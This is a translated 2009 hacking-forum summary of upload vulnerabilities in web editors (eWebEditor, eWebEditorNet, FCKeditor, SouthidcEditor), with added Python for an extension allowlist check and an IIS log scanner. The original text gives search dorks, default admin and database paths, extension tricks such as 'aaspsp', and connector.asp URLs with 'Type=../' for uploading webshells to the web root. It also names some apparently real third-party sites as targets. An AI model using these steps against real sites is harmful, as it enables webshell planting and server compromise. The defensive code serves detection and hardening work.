Editor vulnerability summary - Vulnerability warning - Heiba Security Net (myhack58)

2009-08-07T00:00:00
ID MYHACK58:62200924198
Type myhack58
Reporter Anonymous (佚名)
Modified 2009-08-07T00:00:00

Description

How to search for editor vulnerabilities?

site:editor inurl:asp? id inurl:ewebeditornet

Common editors with such vulnerabilities include:

ewebeditor ewebeditornet fckeditor editor southidceditor SouthidcEditor bigcneditor

One: eWebEditor as an example

1: The default admin back-end of the downloadable package:

http://www.test.com/ewebeditor/admin_login.asp

If the back-end can be entered:

Click Style Management:

Copy the "standard" style (it cannot be modified directly).

In the copied style, add "asa" (or "aaspsp") to the image file types, then click Preview.

Click Design in the editor preview, then upload the .asa webshell (the "big horse") directly.

After uploading, the editor shows the path of the webshell.

(Principle: in IIS, the site's Application Configuration maps the .asa extension to asp.dll, so it is parsed as ASP; .cer and .cdx are mapped the same way.)

If the cer, cdx and asa mappings have been removed, the uploaded file finds no script mapping and will not run.

Alternatively, after copying the style, add "aaspsp" to the image types and upload directly; this allows an .asp file to be uploaded.

2: Download the default database:

www.test.com/ewebeditor/db/ewebeditor.mdb

Then analyze the database:

The webeditor_system table holds the user name and password. If the password cannot be cracked,

look in the webeditor_style table (the table of styles);

mainly check the allowed upload file extensions (the S_FileExt and S_ImageExt fields).

Look for a style in which an earlier intruder has already added asa or aaspsp;

if one exists, it can be reused. (This also works when the back-end cannot be found.)

Then construct the URL:

For example, with ID=46 and S_Name=standard1,

the normal call is: ewebeditor.asp?id=content&style=standard

After changing the ID and the style name:

ewebeditor.asp?id=46&style=standard1

Then enter the editor and upload an asa or asp file to get a webshell.
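Both tricks in this section (adding asa to a style's image types, and adding aaspsp so that an .asp upload passes) come down to how the configured extension list is validated. The usual understanding of the aaspsp trick is that the editor deletes the substring "asp" from the configured list in a single non-recursive pass, so "aaspsp" survives as "asp"; that reconstruction is an assumption here, not eWebEditor's actual code. The Python below is an added defensive example, not part of the original page: it reproduces that flawed cleaning step next to a hardened check that accepts only exact matches from a fixed server-side allowlist and refuses every server-parsed extension (asp, asa, cer, cdx and friends) no matter what an administrator configures. The "|" separator, the allowlist contents and the function names are assumptions.

```python
import os
import re

# Extensions that IIS 5/6 commonly maps to asp.dll in addition to .asp,
# as the page's "principle" note describes (asa, cer, cdx), plus other
# ASP.NET handler extensions. None of these may ever be accepted for upload.
SERVER_SIDE_EXTENSIONS = {"asp", "asa", "cer", "cdx", "aspx", "ashx", "asmx"}

# Fixed server-side allowlist for image uploads (assumed set for the example).
IMAGE_ALLOWLIST = {"gif", "jpg", "jpeg", "png", "bmp"}


def legacy_effective_allowlist(configured: str) -> set:
    """Hypothetical reconstruction of the flawed approach: the administrator-
    configured list (assumed "|"-separated) is 'cleaned' by deleting the
    substring ASP in one non-recursive pass. "aaspsp" collapses to "asp", so the
    cleaning step manufactures the very value it was meant to remove, and
    "asa" / "cer" / "cdx" are never touched at all.
    """
    cleaned = configured.upper().replace("ASP", "")
    return {ext for ext in cleaned.split("|") if ext}


def hardened_effective_allowlist(configured: str, server_allowlist=IMAGE_ALLOWLIST) -> set:
    """Hardened: every configured entry must be an exact member of a fixed
    allowlist. Unknown entries are discarded rather than 'cleaned'."""
    accepted = set()
    for raw in configured.split("|"):
        ext = raw.strip().lower().lstrip(".")
        if ext in server_allowlist:
            accepted.add(ext)
    return accepted


_SAFE_BASENAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def hardened_accepts(filename: str, allowlist: set) -> bool:
    """Validate an upload file name end to end: drop any path component,
    require exactly one extension, compare it lower-cased against the
    allowlist, and refuse server-parsed extensions even if the allowlist
    somehow contains them."""
    base = os.path.basename(filename.replace("\\", "/"))
    if base.count(".") != 1:
        return False
    name, ext = base.split(".")
    ext = ext.lower()
    if not _SAFE_BASENAME.match(name):
        return False
    if ext in SERVER_SIDE_EXTENSIONS:
        return False
    return ext in allowlist
```

The lasting fix on the server side is the one the page itself names: remove the asa, cer and cdx script mappings and deny execute permission on the upload directory, so that a file which slips past the name check still cannot run.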

Two: eWebEditorNet exploit

The default upload address:

www.test.com/ewebeditornet/upload.aspx

A .cer webshell can be uploaded directly.

If the upload does not go through:

Enter the following in the address bar: javascript:lbtnUpload.click();

Then view the page source:

search for uploadsave to find the save path.

By default files are saved to the uploadfile folder.

(Fix: in IIS, set the execute permissions of the upload folder to None.)

Three: FCKeditor exploit

http://www.test.com/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUpload&Type=Image&CurrentFolder=/

Change the file-name part (the NewFile field) to a name of your choosing; after the upload, find the file under /userfiles/image/.

Four: SouthidcEditor

http://www.xhkjit.com/admin/southidceditor/datas/southidceditor.mdb

http://www.xhkjit.com/admin/southidceditor/popup.asp

http://www.xhkjit.com/admin/southidceditor/admin/admin_login.asp

Five: BigCNEditor

Not much to say about this one;

the principle is almost the same.

The prevention method is very simple, so it is not covered here.

FCKeditor upload vulnerability:

http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp

Opening this address lets you upload a file of any type; the webshell is uploaded to http://www.xxx.com/UserFiles/all/1.asa. The "Type=all" variable is user-defined: a directory named "all" is created here, and newly created directories carry no upload file-format restrictions.

For example, entering http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyer&Connector=connectors/asp/connector.asp

uploads the file to http://www.xxx.com/UserFiles/monyer/.

And entering http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp uploads it to the site's web root, where whatever script type the site supports will run.

The file is uploaded to the web root directory.
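On the detection side, as an added example that is not part of the original page: the Python below scans IIS W3C extended log lines for the two patterns this section describes, an upload through connector.asp whose Type parameter carries a traversal sequence or a caller-chosen folder name instead of one of the file manager's normal resource types, and a server-side script extension being served out of the UserFiles tree (the page's /UserFiles/all/1.asa case). The log excerpt is constructed for the example; the field layout is read from the #Fields header rather than hard-coded, and the set of "expected" resource types is an assumption.

```python
from urllib.parse import parse_qs

# Constructed IIS 6 W3C extended log excerpt for this example; the addresses,
# timestamps and paths are made up and do not come from the page.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2009-08-07 10:01:02 203.0.113.5 GET /fckeditor/editor/filemanager/browser/default/browser.html Type=Image&Connector=connectors/asp/connector.asp 200
2009-08-07 10:01:09 203.0.113.5 POST /fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp Command=FileUpload&Type=../&CurrentFolder=/ 200
2009-08-07 10:01:15 203.0.113.5 GET /UserFiles/all/1.asa - 200
2009-08-07 10:02:00 198.51.100.9 POST /fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp Command=FileUpload&Type=Image&CurrentFolder=/ 200
2009-08-07 10:02:30 198.51.100.9 GET /UserFiles/Image/photo.jpg - 200
"""

# Resource types FCKeditor's file manager normally uses (assumed set);
# anything else in Type= is a caller-chosen folder name.
EXPECTED_TYPES = {"file", "image", "flash", "media"}

# Extensions that IIS hands to a script engine; none belong under an upload tree.
SCRIPT_EXTENSIONS = {"asp", "asa", "cer", "cdx", "aspx", "ashx", "asmx"}


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            parts = line.split(" ")
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))


def classify(rec):
    """Return the list of detection names that apply to one request record."""
    stem = rec["cs-uri-stem"].lower()
    query = rec["cs-uri-query"]
    params = {}
    if query != "-":
        params = {k.lower(): v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    findings = []
    if stem.endswith("/connector.asp") and params.get("command", "").lower() == "fileupload":
        rtype = params.get("type", "")
        if ".." in rtype or "/" in rtype or "\\" in rtype:
            findings.append("connector-upload-traversal")    # the Type=../ pattern
        elif rtype.lower() not in EXPECTED_TYPES:
            findings.append("connector-upload-custom-type")  # the Type=all / Type=monyer pattern
    if "/userfiles/" in stem:
        ext = stem.rsplit(".", 1)[-1] if "." in stem else ""
        if ext in SCRIPT_EXTENSIONS:
            findings.append("script-served-from-upload-dir")
    return findings


def scan(text):
    """Scan a whole log text; return (client ip, uri stem, finding) triples."""
    return [(rec["c-ip"], rec["cs-uri-stem"], f)
            for rec in parse_w3c(text)
            for f in classify(rec)]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Run against the constructed excerpt, the scan flags only the first client's connector upload with Type=../ and its later request for /UserFiles/all/1.asa; the second client's ordinary image upload and image fetch produce nothing. A successful hit on a script extension under UserFiles is the stronger signal, because it means the upload directory still has script mappings and execute permission, which is exactly what the page's fix removes.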

http://www.b-horse.cn/newEbiz1/EbizPortalFG/portal/html/BBSThreadMessageMaint.html?forumID=46&threadID=457&messageID=532&ListType=FromForum&FromCurrentPage=1&time=1219282232781